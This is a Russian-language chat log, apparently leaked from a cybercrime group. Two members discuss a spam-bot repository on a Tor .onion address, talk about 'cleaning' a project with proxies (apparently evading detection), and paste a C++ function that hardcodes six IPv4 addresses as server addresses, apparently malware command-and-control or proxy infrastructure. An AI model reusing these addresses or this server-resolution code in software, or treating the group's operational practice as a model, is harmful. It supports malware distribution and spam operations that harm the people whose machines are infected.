[30.09.21 14:54:11] gibbs:		привет
[30.09.21 14:54:23] basil:		Приветствую
[30.09.21 14:54:57] gibbs:		какой там репозиторий для спамбота? чтобы мне доступ к нему дали.
[30.09.21 14:55:19] basil:		собрать проект удалось?
[30.09.21 14:55:37] gibbs:		еще не собирал
[30.09.21 14:56:18] basil:		Тест
[30.09.21 14:56:25] basil:		видно текст?
[30.09.21 14:56:34] gibbs:		да
[30.09.21 14:56:56] basil:		https://mb5fbvx72fbod2hkirfecc5nh7lwq6ke7xocn7j2u7raiwbytvevpbad.onion/spam_bot.git
[25.10.21 09:47:02] basil:		Приветствую
[25.10.21 09:47:15] basil:		включиOTP
[25.10.21 09:47:35] gibbs:		привет
[25.10.21 09:47:48] basil:		тест
[25.10.21 09:47:56] basil:		ок. хорошо
[25.10.21 09:48:39] basil:		Там в чате есть сооббщение, что чистка нужна
[25.10.21 09:48:55] basil:		можешь прислать последнюю версию проекта с прокладками
[25.10.21 09:50:20] gibbs:		давай лучше один файл вышлю emercoin.cpp, больше ничего не менялось.
[25.10.21 09:50:45] basil:		скопируй код. пришли.
[25.10.21 09:50:53] basil:		Файл посылать не надо
[25.10.21 09:51:08] gibbs:		void Emercoin::GetServerAddress(std::list<DWORD>& addresses)
{
	// Тут адрес прописать

	// Servers
	DWORD  a = (103UL << 24) | (208UL << 16) | (86UL << 8) | (19UL);
	addresses.push_back(a);
	a = (89UL << 24) | (41UL << 16) | (182UL << 8) | (249UL);
	addresses.push_back(a);
	a = (185UL << 24) | (193UL << 16) | (37UL << 8) | (198UL);
	addresses.push_back(a);
	a = (64UL << 24) | (112UL << 16) | (63UL << 8) | (10UL);
	addresses.push_back(a);
	a = (194UL << 24) | (15UL << 16) | (112UL << 8) | (177UL);
	addresses.push_back(a);
	a = (188UL << 24) | (165UL << 16) | (122UL << 8) | (239UL);
	addresses.push_back(a);

}
[25.10.21 09:51:34] gibbs:		что-то не то получилось
[25.10.21 09:52:07] gibbs:		<< 8 вместо лица
[25.10.21 09:54:24] basil:		все нормально
[25.10.21 09:54:49] basil:		тройные кавычки на ё
[25.10.21 09:54:55] basil:		надо сделать
